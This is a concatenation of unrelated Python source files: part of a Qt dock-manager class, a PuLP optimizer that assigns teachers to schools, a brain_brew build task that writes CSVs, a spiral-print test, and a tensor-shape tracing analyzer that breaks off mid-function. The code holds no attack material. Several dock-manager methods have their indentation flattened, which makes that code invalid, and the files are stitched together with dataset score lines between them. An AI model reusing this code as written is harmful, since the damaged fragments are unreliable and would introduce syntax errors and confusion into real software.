# indicator or to change the mouse cursor into a busy cursor.
opening_perspective = Signal(str)
# This signal is emitted if the dock manager finished opening a perspective
perspective_opened = Signal(str)
    def __init__(self, parent: QWidget):
        '''
        The central dock manager that maintains the complete docking system.
        With the configuration flags you can globally control the functionality
        of the docking system.

        If the given parent is a QMainWindow, the dock manager sets itself as
        the central widget. Before you create any dock widgets, you should
        properly setup the configuration flags via setConfigFlags()

        Parameters
        ----------
        parent : QWidget
        '''
        super().__init__(self, parent)
        self._mgr = DockManagerPrivate(self)
        self.create_root_splitter()
        if isinstance(parent, QMainWindow):
            parent.setCentralWidget(self)

        # View menu and drop overlays; the manager registers itself as the
        # first dock container.
        self._mgr.view_menu = QMenu("Show View", self)
        self._mgr.dock_area_overlay = DockOverlay(self, OverlayMode.dock_area)
        self._mgr.container_overlay = DockOverlay(self, OverlayMode.container)
        self._mgr.containers.append(self)
        self._mgr.load_stylesheet()
def deleteLater(self):
floating_widgets = self._mgr.floating_widgets
for floating_widget in floating_widgets:
floating_widget.deleteLater()
self._mgr.floating_widgets.clear()
super().deleteLater()
    def register_floating_widget(self, floating_widget: FloatingDockContainer):
        '''
        Registers the given floating widget in the internal list of floating widgets

        Parameters
        ----------
        floating_widget : FloatingDockContainer
        '''
        self._mgr.floating_widgets.append(floating_widget)
        logger.debug('floating widgets count = %d',
                     len(self._mgr.floating_widgets))
    def remove_floating_widget(self, floating_widget: FloatingDockContainer):
        '''
        Remove the given floating widget from the list of registered floating widgets

        Unknown widgets are logged as an internal error and ignored.

        Parameters
        ----------
        floating_widget : FloatingDockContainer
        '''
        if floating_widget not in self._mgr.floating_widgets:
            logger.error('qtpydocking bug; floating widget not in list: '
                         '%s not in %s', floating_widget,
                         self._mgr.floating_widgets)
            return

        self._mgr.floating_widgets.remove(floating_widget)
    def register_dock_container(self, dock_container: DockContainerWidget):
        '''
        Registers the given dock container widget

        Parameters
        ----------
        dock_container : DockContainerWidget
        '''
        self._mgr.containers.append(dock_container)
def remove_dock_container(self, dock_container: DockContainerWidget):
'''
Remove dock container from the internal list of registered dock containers
Parameters
----------
dock_container : DockContainerWidget
'''
if self is not dock_container and dock_container in self._mgr.containers:
self._mgr.containers.remove(dock_container)
    def container_overlay(self) -> DockOverlay:
        '''
        Overlay for containers (drop-target indicator shown while dragging)

        Returns
        -------
        value : DockOverlay
        '''
        return self._mgr.container_overlay
    def dock_area_overlay(self) -> DockOverlay:
        '''
        Overlay for dock areas (drop-target indicator shown while dragging)

        Returns
        -------
        value : DockOverlay
        '''
        return self._mgr.dock_area_overlay
    # TODO: property
    def config_flags(self) -> DockFlags:
        '''
        This function returns the global configuration flags

        Returns
        -------
        value : DockFlags
        '''
        return self._mgr.config_flags
    def set_config_flags(self, flags: DockFlags):
        '''
        Sets the global configuration flags for the whole docking system. Call
        this function before you create your first dock widget.

        Parameters
        ----------
        flags : DockFlags
        '''
        self._mgr.config_flags = flags
    def add_dock_widget(
            self, area: DockWidgetArea,
            dock_widget: 'DockWidget',
            dock_area_widget: 'DockAreaWidget' = None
    ) -> 'DockAreaWidget':
        '''
        Adds dock_widget into the given area. If DockAreaWidget is not null,
        then the area parameter indicates the area into the DockAreaWidget. If
        DockAreaWidget is null, the Dockwidget will be dropped into the
        container. If you would like to add a dock widget tabified, then you
        need to add it to an existing dock area object using the
        CenterDockWidgetArea.

        Parameters
        ----------
        area : DockWidgetArea
        dock_widget : DockWidget
        dock_area_widget : DockAreaWidget, optional

        Returns
        -------
        value : DockAreaWidget
        '''
        # Register the widget by objectName so find_dock_widget() and the
        # save/restore machinery can locate it.
        self._mgr.dock_widgets_map[dock_widget.objectName()] = dock_widget
        return super().add_dock_widget(area, dock_widget, dock_area_widget)
    def add_dock_widget_tab(self, area: DockWidgetArea,
                            dockwidget: 'DockWidget') -> 'DockAreaWidget':
        '''
        This function will add the given Dockwidget to the given dock area as a
        new tab. If no dock area widget exists for the given area identifier, a
        new dock area widget is created.

        Parameters
        ----------
        area : DockWidgetArea
        dockwidget : DockWidget

        Returns
        -------
        value : DockAreaWidget
        '''
        # Prefer the most recently used area for this identifier; otherwise
        # fall back to the last opened area (or a brand new one).
        area_widget = self.last_added_dock_area_widget(area)
        if area_widget is not None:
            return self.add_dock_widget(DockWidgetArea.center,
                                        dockwidget, area_widget)

        opened_areas = self.opened_dock_areas()
        return self.add_dock_widget(area, dockwidget,
                                    opened_areas[-1] if opened_areas else None)
    def add_dock_widget_tab_to_area(self, dockwidget: 'DockWidget',
                                    dock_area_widget: 'DockAreaWidget'
                                    ) -> 'DockAreaWidget':
        '''
        This function will add the given Dockwidget to the given DockAreaWidget
        as a new tab.

        Parameters
        ----------
        dockwidget : DockWidget
        dock_area_widget : DockAreaWidget

        Returns
        -------
        value : DockAreaWidget
        '''
        return self.add_dock_widget(DockWidgetArea.center,
                                    dockwidget, dock_area_widget)
def find_dock_widget(self, object_name: str) -> 'DockWidget':
'''
Searches for a registered doc widget with the given ObjectName
Parameters
----------
object_name : str
Returns
-------
value : DockWidget
'''
return self._mgr.dock_widgets_map.get(object_name, None)
    def dock_widgets_map(self) -> dict:
        '''
        This function returns a shallow copy of the internal dock widgets
        map so that it is possible to iterate over all dock widgets without
        mutating the manager's internal state.

        Returns
        -------
        value : dict:
        '''
        return dict(self._mgr.dock_widgets_map)
def remove_dock_widget(self, widget: 'DockWidget'):
'''
Removes a given DockWidget
Parameters
----------
widget : DockWidget
'''
self._mgr.dock_widgets_map.pop(widget.objectName())
super().remove_dock_widget(widget)
    def dock_containers(self) -> list:
        '''
        Returns the list of all active and visible dock containers

        Dock containers are the main dock manager and all floating widgets.

        Returns
        -------
        value : list
        '''
        # qtpydocking TODO containers getting deleted
        # Defensive sweep: drop containers whose underlying Qt object has
        # been destroyed (isVisible() raises RuntimeError in that case).
        for container in list(self._mgr.containers):
            try:
                container.isVisible()
            except RuntimeError as ex:
                self._mgr.containers.remove(container)
                logger.debug('qtpydocking TODO, container deleted',
                             exc_info=ex)

        return list(self._mgr.containers)
    def floating_widgets(self) -> list:
        '''
        Returns the list of all floating widgets

        NOTE(review): the internal list itself is returned (not a copy), so
        callers can mutate manager state -- confirm whether that is intended.

        Returns
        -------
        value : list
        '''
        return self._mgr.floating_widgets
    def z_order_index(self) -> int:
        '''
        This function always return 0 because the main window is always behind
        any floating widget

        Returns
        -------
        value : unsigned int
        '''
        return 0
    def save_state(self, version: int = 0) -> QByteArray:
        '''
        Saves the current state of the dockmanger and all its dock widgets into
        the returned QByteArray.

        See also `config_flags`, which allow for auto-formatting and compression
        of the resulting XML file.

        Parameters
        ----------
        version : int

        Returns
        -------
        value : QByteArray
        '''
        xmldata = QByteArray()
        stream = QXmlStreamWriter(xmldata)
        stream.setAutoFormatting(
            DockFlags.xml_auto_formatting in self._mgr.config_flags)
        stream.writeStartDocument()
        stream.writeStartElement("QtAdvancedDockingSystem")
        stream.writeAttribute("Version", str(version))
        stream.writeAttribute("Containers", str(len(self._mgr.containers)))
        for container in self._mgr.containers:
            # The manager itself shares the base-class serialization.
            if isinstance(container, DockManager):
                DockContainerWidget.save_state(container, stream)
            else:
                container.save_state(stream)

        stream.writeEndElement()
        stream.writeEndDocument()
        # Compress only when requested AND the qt binding provides qCompress.
        return (qCompress(xmldata, 9)
                if DockFlags.xml_compression in self._mgr.config_flags
                and qCompress is not None
                else xmldata)
    def restore_state(self, state: QByteArray, version: int = 0) -> bool:
        '''
        Restores the state of this dockmanagers dockwidgets. The version number
        is compared with that stored in state. If they do not match, the
        dockmanager's state is left unchanged, and this function returns false;
        otherwise, the state is restored, and this function returns true.

        Parameters
        ----------
        state : QByteArray
        version : int

        Returns
        -------
        value : bool
        '''
        # Data that does not start with an XML prolog is assumed compressed.
        if not state.startsWith(b'<?xml'):
            if qUncompress is None:
                raise RuntimeError(
                    'Compression utilities unavailable with the '
                    'current qt bindings')
            state = qUncompress(state)

        # Prevent multiple calls as long as state is not restore. This may
        # happen, if QApplication.processEvents() is called somewhere
        if self._mgr.restoring_state:
            return False

        # We hide the complete dock manager here. Restoring the state means
        # that DockWidgets are removed from the DockArea internal stack layout
        # which in turn means, that each time a widget is removed the stack
        # will show and raise the next available widget which in turn
        # triggers show events for the dock widgets. To avoid this we hide the
        # dock manager. Because there will be no processing of application
        # events until this function is finished, the user will not see this
        # hiding
        is_hidden = self.isHidden()
        if not is_hidden:
            self.hide()

        try:
            self._mgr.restoring_state = True
            self.restoring_state.emit()
            result = self._mgr.restore_state(state, version)
        finally:
            self._mgr.restoring_state = False

        self.state_restored.emit()
        if not is_hidden:
            self.show()

        return result
    def add_perspective(self, unique_perspective_name: str):
        '''
        Saves the current perspective to the internal list of perspectives. A
        perspective is the current state of the dock manager assigned with a
        certain name. This makes it possible for the user, to switch between
        different perspectives quickly. If a perspective with the given name
        already exists, then it will be overwritten with the new state.

        Parameters
        ----------
        unique_perspective_name : str
        '''
        self._mgr.perspectives[unique_perspective_name] = self.save_state()
        self.perspective_list_changed.emit()
def remove_perspectives(self, *names):
'''
Removes the given perspective(s) from the dock manager
Parameters
----------
*names : str
'''
count = 0
for name in names:
try:
del self._mgr.perspectives[name]
except KeyError:
...
else:
count += 1
if count:
self.perspectives_removed.emit()
self.perspective_list_changed.emit()
def perspective_names(self) -> List[str]:
'''
Returns the names of all available perspectives
Returns
-------
value : list
'''
return list(self._mgr.perspectives.keys())
    def save_perspectives(self, settings: QSettings):
        '''
        Saves the perspectives to the given settings file as a QSettings
        array of (Name, State) entries.

        Parameters
        ----------
        settings : QSettings
        '''
        settings.beginWriteArray("Perspectives", len(self._mgr.perspectives))
        for i, (key, perspective) in enumerate(self._mgr.perspectives.items()):
            settings.setArrayIndex(i)
            settings.setValue("Name", key)
            settings.setValue("State", perspective)

        settings.endArray()
    def load_perspectives(self, settings: QSettings):
        '''
        Loads the perspectives from the given settings file, replacing any
        currently stored perspectives.  Entries missing a name or state are
        skipped.

        Parameters
        ----------
        settings : QSettings
        '''
        self._mgr.perspectives.clear()
        size = settings.beginReadArray("Perspectives")
        if not size:
            settings.endArray()
            return

        for i in range(size):
            settings.setArrayIndex(i)
            name = settings.value("Name")
            data = settings.value("State")
            if not name or not data:
                continue

            self._mgr.perspectives[name] = data

        settings.endArray()
    def add_toggle_view_action_to_menu(self, toggle_view_action: QAction,
                                       group: str, group_icon: QIcon) -> QAction:
        '''
        Adds a toggle view action to the the internal view menu. You can either
        manage the insertion of the toggle view actions in your application or
        you can add the actions to the internal view menu and then simply
        insert the menu object into your application's menu bar.

        Parameters
        ----------
        toggle_view_action : QAction
        group : str
            Optional sub-menu name; an empty string adds to the top level.
        group_icon : QIcon

        Returns
        -------
        value : QAction
            The action that was inserted into the view menu (the group
            menu's action when a group was used).
        '''
        order = self._mgr.menu_insertion_order
        alphabetically_sorted = (
            InsertionOrder.by_spelling == order
        )
        if not group:
            self._mgr.add_action_to_menu(toggle_view_action,
                                         self._mgr.view_menu,
                                         alphabetically_sorted)
            return toggle_view_action

        try:
            group_menu = self._mgr.view_menu_groups[group]
        except KeyError:
            # First action for this group: create and register the sub-menu.
            group_menu = QMenu(group, self)
            group_menu.setIcon(group_icon)
            self._mgr.add_action_to_menu(
                group_menu.menuAction(), self._mgr.view_menu,
                alphabetically_sorted)
            self._mgr.view_menu_groups[group] = group_menu

        self._mgr.add_action_to_menu(toggle_view_action, group_menu,
                                     alphabetically_sorted)
        return group_menu.menuAction()
    def view_menu(self) -> QMenu:
        '''
        This function returns the internal view menu. To fill the view menu,
        you can use the addToggleViewActionToMenu() function.

        Returns
        -------
        value : QMenu
        '''
        return self._mgr.view_menu
    def set_view_menu_insertion_order(self, order: InsertionOrder):
        '''
        Define the insertion order for toggle view menu items. The order
        defines how the actions are added to the view menu. The default
        insertion order is MenuAlphabeticallySorted to make it easier for users
        to find the menu entry for a certain dock widget. You need to call this
        function before you insert the first menu item into the view menu.

        Parameters
        ----------
        order : InsertionOrder
        '''
        self._mgr.menu_insertion_order = order
    def is_restoring_state(self) -> bool:
        '''
        This function returns true between the restoringState() and
        stateRestored() signals.

        Returns
        -------
        value : bool
        '''
        return self._mgr.restoring_state
def open_perspective(self, perspective_name: str):
'''
Opens the perspective with the given name.
Parameters
----------
perspective_name : str
'''
try:
perspective = self._mgr.perspectives[perspective_name]
except KeyError:
return
self.opening_perspective.emit(perspective_name)
self.restore_state(perspective)
self.perspective_opened.emit(perspective_name)
| 1.828125 | 2 |
src/optimizer_flo.py | sarahsester/q_hackathon | 0 | 12760309 | <reponame>sarahsester/q_hackathon<filename>src/optimizer_flo.py
import pulp
import pandas as pd
import pickle
# Load the precomputed teacher-to-school distance matrix (geopy, kilometres —
# TODO confirm unit against the notebook that produced the pickle).
with open('geopy_distance_matrix_Waldorfschule.pkl', 'rb') as f:
    distance = pickle.load(f)

schooldata = pd.read_csv(r'C:\Users\engel\PycharmProjects\q_hackathon\data\school_dataset.csv')
teacherdata = pd.read_csv(r'C:\Users\engel\PycharmProjects\q_hackathon\data\teachers.csv')

# Restrict both datasets to a single school type (Waldorfschule).
#schooldata = schooldata[schooldata["school_type"].isin(["Gymnasium", "Hauptschule", "Realschule"])]
schooldata = schooldata[schooldata["school_type"].isin(["Waldorfschule"])].reset_index()
#teacherdata = teacherdata[teacherdata["type_of_school"].isin(["Gymnasium", "Hauptschule", "Realschule"])]
teacherdata = teacherdata[teacherdata["type_of_school"].isin(["Waldorfschule"])].reset_index()

# Teacher preferences and school attributes used in the preference penalty.
b = teacherdata["preference_big_school"]
r = teacherdata["preference_rural"]
sb = schooldata["is_big"]
sr = schooldata["is_rural"]
min_teachers = schooldata["min_number_of_teachers"]
number_students = schooldata["student"]
w = 10  # weight of a preference mismatch relative to distance

size_teacher = len(teacherdata)
size_school = len(schooldata)

# create matrix of teacher and school matching
teacher_school_x = [(i, j) for i in range(size_teacher) for j in range(size_school)]
#teacher_school_y = [(i, j) for i in range(size_teacher) for j in range(size_school)]
#teacher_school_z = [(i, j) for i in range(size_teacher) for j in range(size_school)]

# create a binary variable to state that a teacher i is assigned to school j
x = pulp.LpVariable.dicts("teacher_school", teacher_school_x, lowBound=0, upBound=1, cat=pulp.LpInteger)
#y = pulp.LpVariable.dicts("teacher_school", teacher_school_y, lowBound=0, upBound=1, cat=pulp.LpInteger)
#z = pulp.LpVariable.dicts("teacher_school", teacher_school_z, lowBound=0, upBound=1, cat=pulp.LpInteger)

assignment_model = pulp.LpProblem("Teacher_School_Model", pulp.LpMinimize)

# Objective: minimise total travel distance plus weighted preference mismatches.
assignment_model += pulp.lpSum(pulp.lpSum(distance[i, j] * x[i, j] +
                                          x[i, j] * abs(b[i]-sb[j]) * w +
                                          x[i, j] * abs(r[i]-sr[j]) * w #+
                                          #distance[i, j] * y[i, j] +
                                          #y[i, j] * abs(b[i]-sb[j]) * w +
                                          #y[i, j] * abs(r[i]-sr[j]) * w #+
                                          #distance[i, j] * z[i, j] +
                                          #z[i, j] * abs(b[i]-sb[j]) * w +
                                          #z[i, j] * abs(r[i]-sr[j]) * w
                                          for i in range(size_teacher)) for j in range(size_school))

# one school per teacher
for i in range(size_teacher):
    assignment_model += pulp.lpSum(x[i, j] for j in range(size_school)) == 1
#for i in range(size_teacher):
#    assignment_model += pulp.lpSum(y[i, j] for j in range(size_school)) == 1
# for i in range(size_teacher):
#     assignment_model += pulp.lpSum(z[i, j] for j in range(size_school)) == 1

# Worst-treated teacher: cap each teacher's assigned travel distance at 200.
for i in range(size_teacher):
    assignment_model += pulp.lpSum(x[i, j]*distance[i, j]
                                   for j in range(size_school)) <= 200
# + y[i, j]*distance[i, j] + z[i, j]*distance[i, j]

# max teachers per school
for j in range(size_school):
    assignment_model += pulp.lpSum(x[i, j] for i in range(size_teacher)) <= 50  #number_students[j]/25
#for j in range(size_school):
#    assignment_model += pulp.lpSum(y[i, j] for i in range(size_teacher)) <= 50 # number_students[j]/25
# for j in range(size_school):
#     assignment_model += pulp.lpSum(z[i, j] for i in range(size_teacher)) <= 50 # number_students[j]/25

# min teachers per school
for j in range(size_school):
    assignment_model += pulp.lpSum(x[i, j] for i in range(size_teacher)) >= 10  #min_teachers[j]
#for j in range(size_school):
#    assignment_model += pulp.lpSum(y[i, j] for i in range(size_teacher)) >= 10#min_teachers[j]
# for j in range(size_school):
#     assignment_model += pulp.lpSum(z[i, j] for i in range(size_teacher)) >= 10#min_teachers[j]

assignment_model.solve()

# How many teachers are sent to each school.
schulbelegung = []
for j in range(size_school):
    count = 0
    for i in range(size_teacher):
        if x[(i, j)].value() == 1.0:
            count = count + 1
    schulbelegung.append(count)

# Per-teacher distances (with or without preference penalties).
teacher_costs = []
for i in range(size_teacher):
    cost = 0
    for j in range(size_school):
        cost = cost + distance[i, j] * x[i, j].value() #+ x[i, j].value() * abs(b[i] - sb[j]) * w + x[i, j].value() * abs(r[i] - sr[j]) * w
    teacher_costs.append(cost)
print(teacher_costs)
print()
| 2.765625 | 3 |
# brain_brew/build_tasks/csvs/csvs_generate.py
from dataclasses import dataclass
from typing import List, Dict, Union
from brain_brew.build_tasks.csvs.shared_base_csvs import SharedBaseCsvs
from brain_brew.commands.run_recipe.build_task import TopLevelBuildTask
from brain_brew.configuration.part_holder import PartHolder
from brain_brew.representation.yaml.notes import Notes, Note
from brain_brew.transformers.file_mapping import FileMapping
from brain_brew.transformers.note_model_mapping import NoteModelMapping
from brain_brew.utils import join_tags
@dataclass
class CsvsGenerate(SharedBaseCsvs, TopLevelBuildTask):
    """Top-level build task that writes Notes parts back out to CSV files
    according to the configured file and note-model mappings."""

    @classmethod
    def task_name(cls) -> str:
        # Canonical task name used in recipe files.
        return r'generate_csvs'

    @classmethod
    def task_regex(cls) -> str:
        # Accept both "generate_csv" and "generate_csvs" in recipes.
        return r'generate_csv[s]?'

    @classmethod
    def yamale_schema(cls) -> str:  # TODO: Use NotesOverride here, just as in NotesToCrowdAnki
        # Yamale validation schema for this task's recipe entry.
        return f'''\
notes: str()
note_model_mappings: list(include('{NoteModelMapping.task_name()}'))
file_mappings: list(include('{FileMapping.task_name()}'))
'''

    @classmethod
    def yamale_dependencies(cls) -> set:
        # Sub-schemas referenced by yamale_schema above.
        return {NoteModelMapping, FileMapping}

    @dataclass
    class Representation(SharedBaseCsvs.Representation):
        # Part id of the Notes part to export.
        notes: str

        def encode(self):
            """Serialize this representation back to a recipe-shaped dict."""
            return {
                "notes": self.notes,
                "file_mappings": [fm.encode() for fm in self.file_mappings],
                "note_model_mappings": [nmm.encode() for nmm in self.note_model_mappings]
            }

    @classmethod
    def from_repr(cls, data: Union[Representation, dict]):
        """Build the task from a Representation or a raw recipe dict."""
        rep: cls.Representation = data if isinstance(data, cls.Representation) else cls.Representation.from_dict(data)
        return cls(
            rep=rep,
            notes=PartHolder.from_file_manager(rep.notes),
            file_mappings=rep.get_file_mappings(),
            # Flatten each mapping's {model name -> mapping} dict into one dict.
            note_model_mappings={k: v for nm in rep.note_model_mappings for k, v in cls.map_nmm(nm).items()}
        )

    rep: Representation
    notes: PartHolder[Notes]  # TODO: Accept Multiple Note Parts

    def execute(self):
        """Export the notes of every file mapping to its CSV file."""
        self.verify_contents()

        # Case-insensitive sorted copy of the notes (no explicit sort keys).
        notes: List[Note] = self.notes.part.get_sorted_notes_copy(
            sort_by_keys=[],
            reverse_sort=False,
            case_insensitive_sort=True
        )
        self.verify_notes_match_note_model_mappings(notes)

        for fm in self.file_mappings:
            # Only notes whose model is used by this file mapping are written.
            csv_data: List[dict] = [self.note_to_csv_row(note, self.note_model_mappings) for note in notes
                                    if note.note_model in fm.get_used_note_model_names()]
            rows_by_guid = {row["guid"]: row for row in csv_data}

            fm.compile_data()
            fm.set_relevant_data(rows_by_guid)
            fm.write_file_on_close()

    def verify_notes_match_note_model_mappings(self, notes: List[Note]):
        """Raise if any note uses a model that has no configured mapping."""
        note_models_used = {note.note_model for note in notes}
        errors = [TypeError(f"Unknown note model type '{model}' in deck part '{self.notes.part_id}'. "
                            f"Add mapping for that model.")
                  for model in note_models_used if model not in self.note_model_mappings.keys()]
        if errors:
            raise Exception(errors)

    @staticmethod
    def note_to_csv_row(note: Note, note_model_mappings: Dict[str, NoteModelMapping]) -> dict:
        """Convert a single Note into a CSV row dict via its model mapping."""
        nm_name = note.note_model
        row = note_model_mappings[nm_name].note_models[nm_name].part.zip_field_to_data(note.fields)
        row["guid"] = note.guid
        row["tags"] = join_tags(note.tags)
        # TODO: Flags?
        return note_model_mappings[nm_name].note_fields_map_to_csv_row(row)
| 2.171875 | 2 |
# test/test_spiral_print.py (spiral-print)
from src.spiral_print import print_spiral
# Expected spiral traversal of the 10x10 matrix built in test_sprint_spiral.
# Note the trailing space: print_spiral apparently emits one after every
# element, including the last (TODO confirm against src.spiral_print).
answer_ten = "1 2 3 4 5 6 7 8 9 20 30 40 50 60 70 80 90 100 99 98 97 96 95" \
             " 94 93 92 81 71 61 51 41 31 21 11 12 13 14 15 16 17 18 29 39" \
             " 49 59 69 79 89 88 87 86 85 84 83 72 62 52 42 32 22 23 24 25" \
             " 26 27 38 48 58 68 78 77 76 75 74 63 53 43 33 34 35 36 47 57" \
             " 67 66 65 54 44 45 56 "
def test_sprint_spiral():
    """Spiral-printing the 10x10 test matrix yields the expected string."""
    # Row x holds the values x, x+10, x+20, ..., x+90.
    matriz = [[x + 10 * y for y in range(10)] for x in range(1, 11)]
    assert answer_ten == print_spiral(matriz)
| 3.078125 | 3 |
# tsanley/dynamic/dynamic_shape_analyzer.py
import sys
import os
import inspect
from pathlib import Path
from collections import defaultdict
from easydict import EasyDict as ED
from .trace_utils import get_function_name_from_frame
from typed_ast import ast3 as ast
from ..common.ast_utils import expr2ann
from ..common.log_utils import log, debug_log
from .shape_cache import ShapeCache
from tsalib.ts import get_decls
from tsalib.tsn import tsn_to_tuple, resolve_to_int_tuple
# Root of the active Python installation; frames from here are never traced.
PY_HOME = str(Path(sys.executable).parents[1])
EXCLUDE_FILES = [PY_HOME]
# Tsalib classes whose methods should not be traced.
EXCLUDE_CLASSES = ['DimVar', 'DimExpr']
DEBUG_LEVEL = 0

# Stores the analyzer's mutable state (config, shape cache, last traced line).
GLOBALS = ED({})
def should_filter_call(filename, func_name):
    """Return True when a traced call should be skipped, i.e. when the file
    lives under an excluded path or the function belongs to an excluded class."""
    if filename is not None and any(part in filename for part in EXCLUDE_FILES):
        return True
    if func_name is not None and any(part in func_name for part in EXCLUDE_CLASSES):
        return True
    return False
def eval_attribute(a):
    """Reconstruct the dotted name of an `ast.Attribute` node, e.g. `self.w.x`.

    Recurses through nested Attribute nodes; any other receiver kind is
    dumped for debugging and rejected.
    """
    base = a.value
    if isinstance(base, ast.Name):
        return base.id + '.' + a.attr
    if isinstance(base, ast.Attribute):
        return eval_attribute(base) + '.' + a.attr
    import astpretty
    astpretty.pprint(a)
    print (f'{type(a.value)}')
    raise NotImplementedError
def eval_lhs(lhs):
    """Extract the target name(s) of an assignment's left-hand side.

    Returns a single dotted name (str) for Name/Attribute targets, a list of
    names for tuple targets, or None for unsupported node kinds.
    """
    if isinstance(lhs, ast.Name):
        return lhs.id
    if isinstance(lhs, ast.Tuple):
        return [elt.id for elt in lhs.elts if elt]
    if isinstance(lhs, ast.Attribute):
        return eval_attribute(lhs)
    #raise NotImplementedError(f'{type(lhs)}')
    print (f'Not implemented eval lhs for {type(lhs)}')
    return None
def get_var_ann_from_stmt (stmt, frame):
    """Parse one source statement and return (var, ann):
    the assigned variable name (or None) and its tsalib shape annotation as a
    tuple (or None). Only single-target assignments are supported."""
    var, ann = None, None
    tree = None
    #print (f'get_var_ann_from_stmt: {stmt}')
    try:
        tree = ast.parse(stmt.strip())
        #astpretty.pprint(tree)
    except:
        # Broad catch on purpose: partial statements (multi-line constructs)
        # routinely fail to parse and must simply be ignored.
        if GLOBALS.debug:
            log (f'parse failed: {stmt}', style='green')

    if tree is not None and len(tree.body) > 0:
        assign = tree.body[0]
        if isinstance(assign, (ast.AnnAssign, ast.Assign) ):
            if isinstance(assign, ast.AnnAssign):
                # Annotated assignment: `x: 'b,t,d' = ...` — extract the TSN
                # annotation and resolve it to a shape tuple.
                #assign.target, assign.annotation
                ann = expr2ann(assign.annotation)
                if ann is not None:
                    if isinstance(ann, str):
                        ann = tsn_to_tuple(ann)
                    else:
                        assert False, f'unknown annotation format {ann}'
                var = eval_lhs(assign.target)
            elif isinstance(assign, ast.Assign):
                assert len(assign.targets) == 1
                trg = assign.targets[0]
                lvars = eval_lhs(trg)
                if isinstance(lvars, str):
                    var = lvars
                elif isinstance(lvars, (list, tuple)):
                    # Tuple assignment: only the first target is tracked.
                    var = lvars[0]
                    if len(lvars) > 1:
                        log (f'lvars = {lvars}')
                        log ('WARN: only supporting single lhs tensor assignments')
    return var, ann
def get_var_shape(var, frame):
    """Resolve the runtime value of `var` in `frame`'s local scope.

    `var` may be a plain local name ('x') or a dotted attribute path
    ('self.w.shape'); the first component is looked up in `frame.f_locals`
    and the remaining components are resolved with getattr.

    Raises KeyError/AttributeError if the name or an attribute is missing.
    """
    # Fix: removed leftover debug prints and dead commented-out code from the
    # original implementation; the lookup logic is unchanged.
    if '.' not in var:
        return frame.f_locals[var]
    parts = var.split('.')
    obj = frame.f_locals[parts[0]]
    for attr in parts[1:]:
        obj = getattr(obj, attr)
    return obj
def analyze_stmt (last_exec_stmt, line_no, func_name, filename, frame, trb):
    """Analyze one already-executed statement: record the current shape of the
    variable it assigned and, if it carried a TSN annotation, check the
    variable's actual shape against it."""
    debug = GLOBALS.debug
    check_tsa = GLOBALS.check_tsa
    shape_cache = GLOBALS.shape_cache

    var, ann = get_var_ann_from_stmt(last_exec_stmt, frame)
    #the current shape of x (named var) corresponds to post-execution of prev statement
    # so we can check prev stmt's ann against x's shape
    if debug: log (f'>> var, ann : {var}, {ann}')
    if var is not None:
        debug_log (f'\n({func_name}:{line_no}), var={var}', trb.index, level=DEBUG_LEVEL)
        #print (frame.f_locals)
        var_shape = get_var_shape(var, frame)
        shape_cache.update_var_shape(var, var_shape, func_name, filename, line_no,
                                     show=GLOBALS.show_updates)
        if ann is not None and check_tsa:
            shape_cache.shape_check(var, ann, func_name, line_no)
def get_earlier_exec_stmts(last_exec_line, curr_line, frame):
    """Return the (line_number, source_text) pairs for every statement
    executed since `last_exec_line`, up to (but excluding) `curr_line`.

    A `last_exec_line` of None means only the immediately preceding line.
    """
    global GLOBALS
    debug = GLOBALS.debug

    stmt_list, first_line = inspect.getsourcelines(frame.f_code)
    if last_exec_line is None:
        last_exec_line = curr_line - 1
    start = last_exec_line - first_line
    stop = curr_line - first_line
    earlier_stmts = [(first_line + idx, stmt_list[idx]) for idx in range(start, stop)]
    if debug:
        log (last_exec_line, curr_line, start, stop, earlier_stmts, style='bold')
    return earlier_stmts
def trace_lines(frame, event, arg):
    """Per-line trace callback (installed by trace_calls) that analyzes each
    statement of a traced function as it executes.

    On 'line' events it analyzes all statements executed since the previously
    traced line; on 'return' it also flushes the shape cache to disk.
    """
    global GLOBALS
    debug = GLOBALS.debug
    shape_cache = GLOBALS.shape_cache
    if debug:
        print (f'\n==> tracelines: event = {event}')
    if event == 'line':
        context_pos = 0
    elif event == 'return':
        context_pos = -1
    else:
        raise NotImplementedError(f'trace_lines: unknown event {event}')
    #co = frame.f_code
    #func_name = co.co_name
    #print ('varnames: ', co.co_varnames, co.co_freevars)
    co_src = inspect.getsourcelines(frame.f_code)
    filename = frame.f_code.co_filename
    #curr_line = curr_line - 1 - context_pos
    curr_line = frame.f_lineno
    func_name = get_function_name_from_frame(frame)
    if debug:
        log (f'trace_lines: function "{func_name}", executing line {curr_line}')
        log(f'code {co_src[0]}')
    trb = inspect.getframeinfo(frame, context=1)
    #print (trb)
    #code_context = trb.code_context
    #curr_line = code_context[trb.index]
    #print ('globals: ', frame.f_globals )
    if event == 'return': curr_line += 1 #allow tracking the last line before return
    # Analyze every statement executed since the last traced line.
    stmts = get_earlier_exec_stmts (GLOBALS.last_exec_line, curr_line, frame)
    for stmt_line, stmt in stmts:
        analyze_stmt (stmt, stmt_line, func_name, filename, frame, trb)

    GLOBALS.last_exec_line = curr_line
    if event == 'return':
        # Persist the collected shapes once the traced function exits.
        shape_cache.save('/tmp/shape_log.json')
        GLOBALS.last_exec_line = None # function returns, so stop keeping track

    if event != 'line':
        #print (f'tracelines: event = {event}')
        return
    '''
    frame_mem = inspect.getmembers(frame)
    for name, v in frame_mem:
        #print (name)
        if name == 'f_locals':
            print (name, v)
    '''
import fnmatch
def trace_calls(frame, event, arg):
    """Global trace callback (installed via sys.settrace).

    On each 'call' event, decides whether the called function matches one of
    the configured GLOBALS.trace_into patterns (fnmatch-style); if so, returns
    trace_lines so that function is traced line-by-line.
    """
    global GLOBALS
    TRACE_INTO = GLOBALS.trace_into
    debug = GLOBALS.debug
    #print (frame, event, arg, frame.f_code.co_name)
    if event == 'call':
        co = frame.f_code
        func_name = co.co_name
        if func_name == 'write':
            # Ignore write() calls from print statements
            return
        func_name = get_function_name_from_frame(frame)
        #if func_name in TRACE_INTO:
        #    debug_log (f'> trying {func_name}, {co.co_filename}')
        curr_line = frame.f_lineno
        filename = co.co_filename
        #log (f'>> call to {func_name} on line {curr_line} of (unknown)')
        if should_filter_call(filename, func_name): return
        #log (f'>> call to {func_name} on line {curr_line} of (unknown): {TRACE_INTO}')
        # An empty pattern list means "trace everything".
        matched = False
        if len(TRACE_INTO) == 0: matched = True
        else:
            matched = any([fnmatch.fnmatch(func_name, pat) for pat in TRACE_INTO])
        #if len(TRACE_INTO) == 0 or func_name in TRACE_INTO or 'forward' in func_name:
        if matched:
            # Trace into this function
            log(f'\n> Analyzing function {func_name}')
            GLOBALS.last_exec_line = None #TODO: push curr_line on stack
            return trace_lines
        #return trace_calls
    elif event == 'return':
